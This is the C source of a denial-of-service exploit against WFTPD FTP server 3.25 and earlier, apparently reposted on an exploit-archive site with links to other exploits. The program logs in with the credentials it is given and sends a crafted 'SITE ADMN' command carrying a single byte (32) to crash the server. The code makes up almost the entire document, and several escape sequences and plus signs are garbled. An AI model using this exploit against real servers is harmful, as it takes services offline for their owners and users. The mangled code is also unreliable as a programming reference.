/************************************************************************
*WFTPD server <= 3.25 SITE ADMN DoS *
* *
*Sending command SITE ADMN 32 makes server BOOM *
* *
*usage: wftpd_dos.exe ip port user pass *
* *
*Coded by Marsu <Marsupilamipowa@hotmail.fr> *
************************************************************************/ #include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#pragma comment(lib, "ws2_32.lib") int main(int argc, char* argv[])
{
struct hostent *he;
struct sockaddr_in sock_addr;
WSADATA wsa;
int ftpsock;
char recvbuff[1024];
char evilbuff[100];
int buflen=100; if (argc!=5)
{
printf("[ ] Usage: %s <ip> <port> <user> <pass>n",argv[0]);
return 1;
}
WSACleanup();
WSAStartup(MAKEWORD(2,0),&wsa); printf("[ ] Connecting to %s:%s ... ",argv[1],argv[2]);
if ((he=gethostbyname(argv[1])) == NULL) {
printf("Failedn[-] Could not init gethostbynamen");
return 1;
}
if ((ftpsock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
printf("Failedn[-] Socket errorn");
return 1;
} sock_addr.sin_family = PF_INET;
sock_addr.sin_port = htons(atoi(argv[2]));
sock_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(sock_addr.sin_zero), '', 8);
if (connect(ftpsock, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {
printf("Failedn[-] Sorry, cannot connect to %s:%s. Error: %in", argv[1],argv[2],WSAGetLastError());
return 1;
}
printf("OKn");
memset(recvbuff,'',1024);
recv(ftpsock, recvbuff, 1024, 0); memset(evilbuff,'',buflen);
memcpy(evilbuff,"USER ",5);
memcpy(evilbuff 5,argv[3],strlen(argv[3]));
memcpy(evilbuff 5 strlen(argv[3]),"rn",3);
printf("[ ] Sending USER ... ");
if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
printf("Failedn[-] Could not sendn");
return 1;
}
printf("OKn");
memset(recvbuff,'',1024);
recv(ftpsock, recvbuff, 1024, 0); memset(evilbuff,'',buflen);
memcpy(evilbuff,"PASS ",5);
memcpy(evilbuff 5,argv[4],strlen(argv[4]));
memcpy(evilbuff 5 strlen(argv[4]),"rn",3); printf("[ ] Sending PASS ... ");
if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
printf("Failedn[-] Could not sendn");
return 1;
}
printf("OKn");
recv(ftpsock, recvbuff, 1024, 0); memset(evilbuff,'',buflen);
memcpy(evilbuff,"SITE ADMN ",10);
memset(evilbuff 10,32,1); //this char is powerfull :p
memcpy(evilbuff 10 1,"rn",3); printf("[ ] Sending SITE ADMN ... ");
if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
printf("Failedn[-] Could not sendn");
return 1;
}
printf("OKn"); printf("[ ] Host should be downn");
return 0;
}
//http://www.leftworld.net
【WFTPD Pro Server】相关文章:
★ Poppler
★ Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit
★ Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit
★ DESlock
★ Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit
★ trixbox (langChoice) Local File Inclusion Exploit (connect-back)
★ Microsoft Excel Malformed Palette Record DoS PoC (MS07-002)
★ Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit
★ Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit